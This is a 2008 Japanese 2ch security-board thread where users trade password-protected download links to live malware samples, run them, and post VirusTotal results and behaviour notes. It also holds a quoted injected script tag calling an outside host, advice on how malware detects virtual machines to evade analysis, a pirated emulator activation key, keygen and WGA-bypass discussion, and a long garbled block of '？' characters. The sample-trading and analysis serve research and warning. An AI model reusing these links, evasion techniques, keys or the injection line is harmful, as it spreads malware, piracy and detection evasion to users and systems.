ttp://www5.uploader.jp/dl/tane/tane_uljp00311.zip.html
パス：virus

検出可否スレも見てる

休憩時間に、とりあえず0だけ踏んでみた
手抜きしてるんもあるんだが、うまく感染させられなかった
無理矢理実行してみたが、なんかアンケート画面(日本語英語じゃない)みたいのの
URLを見に行こうとして、それ以上進めない

821 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2008/03/13(木) 16:37:27
次
ttp://www5.uploader.jp/dl/tane/tane_uljp00309.zip.html
Malware-Pack27

感染が怖いなら右クリ（ｒｙ

887 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2008/03/14(金) 16:07:23
お題
ttp://www.lineagecojp.com/movie/mov0028.zip

パスはないのでダウンロード後の扱いに注意してね

http://updas.net/up/download/1205455546.zip
p:vip

次はこれかｗ

http://updas.net/up/download/1205455546.zip
p:vip

次はこれかｗ

913 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2008/03/15(土) 00:17:44
お題！？
http://www5.uploader.jp/dl/tane/tane_uljp00312.zip.html
pass:virus

922 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2008/03/15(土) 11:46:28
問題のトレンドマイクロのHPに埋め込まれたウイルスです

http://www5.uploader.jp/dl/tane/tane_uljp00310.rar.html

パス：TM

日本時間：15日8時頃
JS_IFRAME.JZ
http://www.virustotal.com/jp/analisis/804298425d6ccfb4383f1af93a7c6634
JS_DLOADER.TZE
http://www.virustotal.com/jp/analisis/933edad4836834738edd51b8561fb542

926 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2008/03/15(土) 21:03:40
お題
http://www5.uploader.jp/dl/tane/tane_uljp00313.zip.html
p:messenger

現時点ではカスペやAVGですら検知できてません。

940 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2008/03/16(日) 12:19:06
ttp://www5.uploader.jp/dl/tane/tane_uljp00314.zip.html
virus

次はこれかｗ

956 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2008/03/16(日) 19:59:45
>>949の修正版
ttp://www5.uploader.jp/dl/tane/tane_uljp00317.zip.html
virus

なんで
【ｿｰｽﾈｸｽﾄ/K7】ウイルスセキュリティZERO pert18
http://pc11.2ch.net/test/read.cgi/sec/1201032031/
からコピペしてんの?

休み時間に、またちょっとつついてみた

>>862
現在は: ダウソ先がつながんない
てかこれ、itmediaで見たときには、すでにつながんなかったんだな

>>863
難読化が少なくとも3層かかってる
サービスぽい名前のコピーを作って、自分は終了する
コピーが*.cybernix.info:8888につなごうとしてた
これはテーブルに書いてあるようで、容易に変更できるようにしているのかと
ちょっとパケット覗けないPC状況だったので、そっからは覗けてない

メッセがCreateInstance()で操作できるってのは、やっぱり罪なことなのかなと

いずれも有害ははっきりしてるものだしってことで、
のんびり、踏んでみたのは うんちく程度にレポする

115 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2008/03/18(火) 13:55:29
ちょい古いけどまとめたもの。
http://www.dotup.org/uploda/www.dotup.org5768.zip.html
pass:virus
988 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2008/03/18(火) 14:00:27
ちょい古いけどまとめたもの。
http://www.dotup.org/uploda/www.dotup.org5768.zip.html
pass:virus

11 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2008/03/19(水) 10:45:10
virus
http://www5.uploader.jp/dl/tane/tane_uljp00319.zip.html

次はこれかｗ

>>869 Flashのほう

IEで ttp://br.youtube.com/watch?v=FGoGb1aYpbc を開いている間に、
偽IE, 偽ノートン(名前だけ。Delphiのアイコンのままだ), 偽メッセが落ちてくる
それぞれ、どっかの銀行の垢抜き、orkutの垢抜き、自分(偽flash9)の流布をしてるんだろう
だろう、っていうのは、中覗いててきとーに予想したことなので なにしろ英語でもないし
これらはtinyurlを経由して指定されていて、平文のexeだ

>>869 もういっこのほう

なんか処理してるっぽい画面が出た後、
IEで ttp://www.receita.fazenda.gov.br/Aplicacoes/ATCTA/cpf/ConsultaPublica.aspを表示
ぼーっとしてるまに、exeが２個落ちてくる
httpで手短に送信したあと、こんどはどっかにftpでつなごうとするところまで見た

インスコマン……(;´д⊂ヽ

スレ維持しておけば、帰ってきはるかと

あげ

>>873
まだ覚えてくれている人がいたんですね

>>873
コテ使わないでセキュ板見てます

>>870-871
乙。

ｷﾀｰ

noop

bochs

http://www5.uploader.jp/dl/tane/tane_uljp00030.exe.html
pass12345

バーチャルガール？

yourfilehostなんかの広告にでてくるvirtualgirlってやつだと思います
いま最新版落としてきたら、完全一致しました

インスコしたことがあります そのときは、微エロ系デスクトップマスコットでした
初期データセット(無料分)、本体、関係DLLなど、とにかく大量にﾀﾞｳｿしてくるです
無料のマスコットセットがいくつか付いてきて、そろえるには購入が必要という手合いです
メアド登録して垢をとらされます
そこに、追加購入したセット、期間限定で取得したセットが紐づけられます

ありがちな、別添アドウェア、別添トロイはなかったぽかったですが、
bbspinkに慣れた人なら、とびついて使うようなもんでもないかも

ttp://uproda.2ch-library.com/src/lib021724.zip

解凍後のexeアプリケーションを実行しましたが問題ないでしょうか。
鑑定をお願いします

いまどきexeちょっと踏んだくらいでは、安全の保証ってできかねますけどね
明らかに有害か、ちょっと踏んでみた限りでは脅威がなさげか、所詮そのどっちかです

>>881
クラックツールです ｢これってなんですか？｣に準じて対応。

MGADiag.exe
MS純正のWGA診断ツールのようです 一応署名されています v1.5系。最新ではありません
実行するとネットにアクセスします 通常どおりWGAを試みているのでしょう

keyfinder.exe
www.magicaljellybean.comで配っているkeyfinderです 最新ではありません
公式に配布している旧バージョンと一致しました 自己解凍書庫だったりするのは仕様です
レジストリに記録されているキーを収集してくれるみたいです
キーの書き換え機能もあります 書庫の中の.vbsファイルを覗けばわかりますが、案外素直。

wga-fix.exe
hostsファイルを操作して、WGAへの通報を抑制しようとしているのでしょう
意図はわからんではないのですが、効果が今でもあるのかは存じかねます
安全鑑定はいたしかねます ｺﾋﾟを是認する方に委ねます

Windows XP Keygen.exe
よくわからない計算をして、キーらしきものを吐きます
安全鑑定はいたしかねます ｺﾋﾟを是認する方に委ねます

ありがとうございます。

“コピを是認する方”はここにはいないということでしょうか

割れ厨はダウソ板にでも行ってください

あやしいファイルには違いないわな

コピ の意味が判らずに書き込んでしまいました。
あと 割れ厨 の意味も判りません。
ご教示ください。

首つって氏ね

淡々とマジレス

ｺﾋﾟ: 違法コピー。
割れ厨: この場合、先方の主義に関わらず自らの違法コピーを推進しようとする人々。

２ちゃんねるにはいろんな人がおり、ｺﾋﾟに対する姿勢は様々ですが
ｺﾋﾟを暗黙であれ、容認するスレ以外では、あんまりｺﾋﾟの話はしないほうがいいわけです

そのファイルを積極的に踏んだのであればいうまでもなく、だまされて踏まされたとしても、
そのファイルをOKと鑑定しても、NGと鑑定しても、割れ厨さんに寄与してしまいますので、
ｺﾋﾟに容認な人も否認な人もまじってるこの板では、なんともいうてさしあげられかねます

あと８８８げと

ありがとうございました

このスレの住人って当然、仮想マシン(VmWare VirtualPC)から
ファイル実行してんだよね。じゃなきゃ怖くてそんなことできない。

むしろ普通にVPC/VMWare上で実行は×
仮想マシンよけが実装されてることが増えてる

>>891
仮想マシンよけ？
一体、どういう原理で仮想マシンか否か識別してるわけ？

VMWareにせよ、VPCにせよ、高速化する専用ドライバとかいれるでしょ
ああいうのを検出すればいい これはカンタン
あと、(仮想マシン上に)rootkitが入ったときに、CPUの使用方法が通常モードと違うから、
これを検出したら、悪意ある行動をやめるか、遅らせるとかするといい

？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？
？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？
？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？
？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？
？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？
？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？
？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？
？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？
？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？
？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？
？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？
？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？
？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？
？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？
？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？
？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？
？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？
？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？？

http://www1.axfc.net/uploader/He/so/109598.exe

これをじっこうするとハルヒというのがでました。ウイルスですか？ＮＯＤ３２では検出されません。

キーワードは　１　です

レジストリを書き換えて、毎度実行するようにはなるみたいです
タスクマネージャの起動の抑制もかかります あと音がでます
無害でも無益です 踏まない方がいいでしょう

>>895
AVGで検出したもの
http://www.virustotal.com/analisis/bffcc77feb19478b7c90f66a77847c5d
http://www.virustotal.com/analisis/f4a6e7e6c9e3bfc852821ecb30a37f80

ま、カスペとAVGがウイルスといってる以上ウイルスなんじゃね？

　

　

1.http://www5.uploader.jp/user/tane/images/tane_uljp00056.png
2.http://www5.uploader.jp/user/tane/images/tane_uljp00055.png

3.http://www5.uploader.jp/user/tane/images/tane_uljp00054.png
過疎ってるからage

MBAMお勧め！(上のマルウェアも大方これで削除可能！ComboFixもお勧め！)
ttp://www.bleepingcomputer.com/malware-removal/uninstall-antivirus-2009

>>902の画像のさいとのURLのっけときます
195.225.176.63/in.php?id=16&se=1&keyword=Polliciy22.info&host=gremmioti.cn&dkw=

インスコマーーーーン (´Д⊂

すみません、原田ウイルス００（ダブルオー）というマルウェアを
お持ちの方提供していただけないでしょうか？ 未だに遭遇できないので。

>>905
http://tmp7.2ch.net/download/

http://www.gamesrb.com/rbv/uu.exe
http://www.gamesrb.com/rbv/uu.rar

これの駆除に苦労したわー

大手ベンダースルーしまくりだったので要注意

>>907
ttp://www.virustotal.com/analisis/3e853c3d9baa9c893c309cf40e91a2ea

ttp://www.virustotal.com/jp/analisis/1ad8d2f4cbba6f192e54ef4de3182591

やられた…………NOD32無反応…………

>>909
NOD32どころかカスペ以外の主要ベンダーは全滅じゃねーか！！
Symantec、Trend MicroどころかAntiVir、avast!、AVG、BitDefenderまでスルー。
まずはその検体を↑のベンダーに提出してみては？

>910
無論、8/5の時点で提出済み。そのときは、どのソフトもウイルス判定してませんでした。

今日の朝になるまでは、カスペすら全く反応無し。

あからさまにネットワークの使用量が跳ね上がったので、おかしいとは思ったんだけど、
ウイルス判定が全く出なかったので自分の勘違いかと思ったよ。

タスクマネージャみたら、妙な名前のプロセスだけが動いてるもんだから、これ以外、あり得なかったのだが。
アドバンストヒューリスティックエンジンを過信しすぎるのも禁物だな……いい経験になったよ。

http://uploadr.net/file/ac27de91b5

http://uploadr.net/file/ac27de91b5

>>912
AVGが反応したぞ。なんだこれは。

912はAntiVirもavast!もBitDefenderも反応する。
Symantecまで反応するがカスペはスルーした。

>>914-915
他スレで晒されていた"NeorageX"というエミュレータのhack版らしいｗ
多分、誤検出。

>>916
AntiVir、avast!、AVG、BitDefender、McAfee、NOD32、Symantecまで検出してるのにこれが誤検出？
ここまで主要ベンダーが検出してるのにとても誤検出とは考えにくいんですけど・・・？

>>917
実行してみたけど、普通にエミュレータとして動作したよ？

そんなの検体送ればすぐ分かる事

clamではスルーされたorz

そもそもキーを入力しないと、unpackが進まない予感

パックされた本体(PDATA)を除いて、スタブだけにして送ってみた
(整合性が失われた状態のファイルのスキャン結果は、ベンダのポリシにもよるため、参考値)
http://www.virustotal.com/analisis/2bc3aad954364fa6444106b88f264154

そもそも本当にウイルスなら実行した時点でキーの入力なんて求めるわけないし、
わざわざキーを入力しないとウイルスとして動けないなんてものあるわけないｗ

…まあ、実行してみたサンドボックスのせいで、
通常要求してこないキー要求があったのかもしれないとも思ってたり
パッカって意外とそんなもん。

っていう雑談

一応>>912のファイルはzlib.dllとneogeoのbiosが無いと起動すらしないはず。
さらに以下のキーを入力しないとちゃんと動作しない。
Emu-Zone
6FB3-2BC0-A3B4-B5A5

Ｚ. 起動はしないけど、制御は本体までたどり着ける
entry 48876c かな
つかこれ、何層パッカかかってるんだか
制御を奪取できればおんなじことなんだが、誤検出だとしたれら、それを招いてる原因にはなるかも

一応、その時点でダンプしたものをVTに押し込んでみた
純粋にダンプしただけ PEファイルとして一貫性はないので、著しく参考値
http://www.virustotal.com/analisis/942814cab7eab062bce1d43ba6a75303

で、本体について
ぱっと見には、通信機能はなさげかもだけど、有害じゃない。と言い切ることは昨今不可能に近いので、
それこそ、サンドボックス内での実行を勧めるというあたりかと

明らかにマイクロソフトじゃない所からメールで
IE最新版ダウンロードとかいってそれらしくexeファイルにリンクされてるんですが
これは危険ですか？
www.altotrabajosverticales.com/images/ie7.0.exe

http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ%5FSMALL%2EEBN&VSect=P

途中まで踏んでみた
中にこれ入ってた (UPXかかってるので、サイズはまったく異なる)

http://www.microsoft.com/technet/sysinternals/Miscellaneous/BlueScreen.mspx
http://download.sysinternals.com/Files/BlueScreen.zip

セキュ板に居るくらいの人なら、出てくるエラーの内容で、ただのブルースクリーンじゃないと気づくだろうけど、
(ネタエラーが出てくることもあるし、そうでなくても、見かけない種類のエラーを吐く)
普通だとﾅﾝﾀﾞｺﾘｬ？ってなるだろうな

NoDispScrSavPage, NoDispBackgroundPage が設定されるのは、前評判どおり

>>928
そのscrロックされて解除できなくなるそうだ。

うん。NoDispScrSavPage によるところかな、他にもあるのかな
なんにせ、本家のやつで楽しめばおｋ

>926 さっき俺が踏んでみたｗｗ
ニセセキュリティが起動して
お前は感染してるだの何だの言ってきた
IEのTOP（の一部？）とか壁紙とか変えられちまった

ttp://www-2ch.net:8080/up/　ここの
08/08/12(Tue) 15:32:29　のファイルが
その時のスクリーンショットだから
見たいやつは見て来い

http://free.prohosting.com/njdfgse/index3.html

http://fire.prohosting.com/gjkuydft/cgi-bin/ver4/board.cgi?mode=view&no=222
こんばんは、重要なお知らせがあります。
この板で虚空氏（おそらくトリップ盗んだ偽者）の提供品の２つがウィルス仕込みがなされているのはご存知かもしれないですが、どうやらこのウィルスは某所にスクリーンキャプチャの画像を貼り付け、荒らし行為を行うものらしいです。
たまたまそこのキャプチャ画像にここのサイトが映っていたので注意を促しました。
また２ｃｈにも同じ名前で書き込みがあることから、２ｃｈにも書き込みしているものと思います。

前に公開したツールを使って駆除をオススメ致します。
http://home.no/adobephotoshop/Project1.zip　　確認
↑↑↑↑↑↑↑↑↑↑
これお願いします


私が確認している限りではユーザー名が、

Ak○○○sa　氏
倉○広　氏

○は文字が入ります。まえは-Z○N-氏という方がいましたが最近見なくなりました。
もし心あたりがある方、OSを再インストするか駆除ツール使うかしてください。アンチウィルスは対応していないと思われます（キャプチャ画像にノートンがあったので）

管理人さんはこの私の書き込みが適切でなかったら削除されても結構ですが、トップに警告はして頂きたいと思います。

では。

virustotal
ttp://www.virustotal.com/analisis/f179a22ceba59983edf9fdc18a4d311c

project1.exeは、ぱっと見、Delphiでぱぱっと作成された、
http://changi.2ch.net/test/read.cgi/download/1220292628/364
のキーを検出し、あれば除去するツールのようです
OEP 45c4e0 問題のアプリ(今件真犯人)の強制終了はできない？
こうゆうときは、マルウェアに人気のパッカではなく、UPXくらいにしといたほうが

プログラムを隅から隅まで読んでいるわけではありませんから、完全な安全判定ではありません

あー。強制終了機能ありました うそつきｺﾞﾒｽ

その後、一部アンチウイルスソフトベンダがクロ判定をしたとのウワサを聞きました
詳細不明なのですけど、念のため、シロ寄りのグレーから、クロ寄りのグレーに変更いたします

>>907
今更ながらhttp://www.gamesrb.com/rbv/uu.exeを踏んでしまいました。
ファイルはダウンロードしてないんですが、踏んだだけでNGですか？

単体を実行した際、Windowsディレクトリに何か吐き出すようですので、適宜清掃してください

…そっからすすまん…パッカと砂箱との相性わるいよﾏﾏﾝ…。(バレちゃう以前に、失敗するらしい)

>>936
実行を選択しなければ問題ない

>>938
ありがとうございます。
次回から気をつけたいと思います。

すみません。
これ、Keygen.exeなんですけど、一瞬コマンドプロンプトの
黒い画面が出て、消えました。それで、何も起こりません。
一応実行する前に、Norton Antivirusでスキャンしたんで
すけど、問題無いとのことでした。
一体何だったんだろう？

http://www3.uploader.jp/dl/pc9801/pc9801_uljp00206.zip.html

>>940
ほらよ
http://www.virustotal.com/jp/analisis/e0d1f2fef396fbc4151b20358e6e0520

黒判定だけど中国製のバスターやキラーだと検出できないよ

ttp://www1.axfc.net/uploader/He/so/138811
DLpass：ayasii
こいつらはどうでしょうか？

>>942
He_138811
http://www.virustotal.com/jp/analisis/10ada89c1891cc25d270c36652e495f4

0001.exe
http://www.virustotal.com/jp/analisis/6dceb21cc09883aad237aa7110ca38dc

keikei_uljp00122.exe
http://www.virustotal.com/jp/analisis/84ff69772e1216738aec7daf6805f2fe

誰でも使えるwebサービスを貼り付けるスレなのここ？
実行してねえじゃんｗｗｗ

内容によっては、引き受け手が少ない案件もあるのさ

なんでも実行する勇敢で知恵に富んだ者が集まるスレだと思ってた

ここは鑑定スレじゃねーんだよ

http://www3.uploader.jp/dl/ikedango/ikedango_uljp00001.cab.html

実行するまでもなく、フォーマットするかもしれないショートカット
無害でも無益 Shoさんてだれですか

うめ

あ

http://1039045726:65535/jp.js

本体t.gif.gif

>>952
ttp://www.google.co.jp/search?hl=ja&q=http%3A%2F%2F1039045726%3A65535%2Fjp.js&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=&aq=f&oq=
Lineage II 板「<script src=http://1039045726:65535/jp.js></script>」
最近このサイトを見た方は、 ウイルスチェックとパスワードの変更をお勧めします。
>>追記これは少し前に XREA がやられた時と同じタイプなので、 （省略されました・・全てを読むにはここを ...
jbbs.livedoor.jp/game/7135/ - 39k - キャッシュ - 関連ページ - メモをと

ttp://www.virustotal.com/jp/analisis/89ecab35bb571338676d641fa814cca7

>>953
実行してもこの手のタイプのマルウェアは目立った症状がないから
困る。悪玉も見つかんないし。ネトゲインスコされてないから動作してナインかな

さっきからexplorerの動作が安定しない
やっぱマルウェア動いてんのかな・・・

hostsを書き換えにいったみたいなのと、何かDLLを一個吐いたところまではみたけど、
感染行動が途中で止まっちまったらしい

ニーズのバカが集まるスレ

テスト